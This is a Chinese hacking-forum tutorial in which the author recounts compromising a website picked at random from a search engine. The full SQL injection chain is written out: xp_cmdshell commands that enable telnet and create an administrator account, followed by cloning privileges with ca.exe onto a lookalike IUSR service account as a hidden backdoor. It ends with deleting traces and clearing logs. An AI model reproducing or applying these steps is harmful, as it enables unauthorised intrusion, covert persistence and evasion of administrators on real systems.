文章作者:恶猫 [E.S.T]
信息来源:邪恶八进制安全小组
这两天正在学注入,看了不少注入的文章,自己也想试试。
于是在百度里搜索asp?id=121,随便进进了一个
ww.xxx.com/new/show_type.asp?typeid=121便开始测试。
输入
www.xxx.com/new/show_type.asp?typeid=121'出错显示:
Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
说明对方是MSSQL而且很有可能存在注入漏洞,并且没有过滤特殊字符'。
然后我们输入
www.xxx.com/new/show_type.asp?typeid=121;
正常显示说明没有过滤;
继续输入
www.xxx.com/new/show_type.asp?typeid=121 and user_name()='dbo'
看看网页上用的SQL帐户是不是DBO权限的,如果是,则有可能利用xp_cmdshell执行系统命令,这样一来造成的危险是众所周知的。
结果返回正常页,这面说明对方用的就是dbo权限的SQLServer帐户。
用PortReady1.6扫了一下,对方开放21,25,80,1433,3389端口,果然有MSSQL。我于是尝试利用xp_cmdshell执行系统命令,输入:
www.xxx.com/new/show_type.asp?typeid=121;exec master.dbo.xp_cmdshell 'net start telnet'----
这时再用PortReady1.6扫一下,发现对方的23端口竟然真的被打开了。正如我所计划的一样,现在继续。
我输入:
www.xxx.com/new/show_type.asp?typeid=121;exec master.dbo.xp_cmdshell 'net user est est /add'----
这样在系统上加了用户名和密码均为est的用户账号。
www.xxx.com/new/show_type.asp?typeid=121;exec master.dbo.xp_cmdshell 'net localgroup administrators est /add'----
这样做就把我们刚才新建的est账号提升为管理员。
好现在是重点部分,即如何在系统上建立傀儡帐号。
用3389连接器连接对方,用新加的est帐户登陆,经过测试果然是管理员权限。进入计算机管理,看到他有一个IUSR_WEBSERVER的系统账号(WEBSERVER为入侵主机的机器名,如果注册名不同就不同的)
我建立一个名为IUSR_WEBSERVICE(只要和IUSR_XXXXX相似就可以了,随便你怎么起,一定要越象越好)密码是est的账号并把他提升到ADMINISTRATORS组,然后修改IUSR_WEBSERVER用户的密码是est。
现在我们用榕哥的ca.exe使IUSR_WEBSERVER具有IUSR_WEBSERVICE的权限。
有人会说为什么不直接clone最初的est账号?因为我们用est登陆终端后会在系统的文件夹Documents and Settings下出现一个est的文件夹,经过我的测试,如果我们clone的是est这个帐号,那么由于clone帐号与被clone帐号使用的是同一个桌面等环境变量,我们将无法删除est这个文件夹的,这样很容易被管理员发现,不够慎重。
本想用ca远程clone,但是总是出现Connect xxx.xxx.xxx.xxx ....ERROR的错误,可能ca的远程使用也要象opentelnet一样先建立ipc$吧,不太清楚了,我也不好多研究了,只好本地clone。
ca \\127.0.0.1 IUSR_WEBSERVICE est IUSR_WEBSERVER est
clone好后将IUSR_WEBSERVICE的用户删除,现在我们的IUSR_WEBSEVER就是隶属于GUESTS组的,但是具备的是IUSR_WEBSERVICE的管理员权限。这样注销est用IUSR_WEBSERVER登陆终端,测试权限正常后,就把通过SQL建立的est账号删除,并把Documents and Settings下出现的est的文件夹删除。注意这里由于我们没有使用IUSR_WEBSERVICE登录过,所以不会创建IUSR_WEBSERVICE文件夹。
好了傀儡帐号建立成功,剩下的任务就是给肉鸡打补丁,修漏洞,关闭telnet,清日志了。
现在我来说一下加固后的肉机现象:
系统中有用户
ADMINISTRATOR 这个就是内置帐号管理员,我没碰。
est 这个是我当时通过Injection方法加的管理员,现在已经删除了。
IUSR_WEBSERVER 属于GUESTS组,但是事实上已经是IUSR_WEBSERVICE的权限,谁会注意他呢。
IUSR_WEBSERVICE 属于ADMINISTRATORS组,是我们自己用帐号est创建的,不过已经删除了。
到这里,文章就写完了,这样的帐号简单而隐蔽。看到这里应该明白了一点吧。
这是一篇写给菜鸟的文章,本人很菜,文章有什么不妥的地方请指正。在此感谢冰血在入侵过程中的耐心帮助!
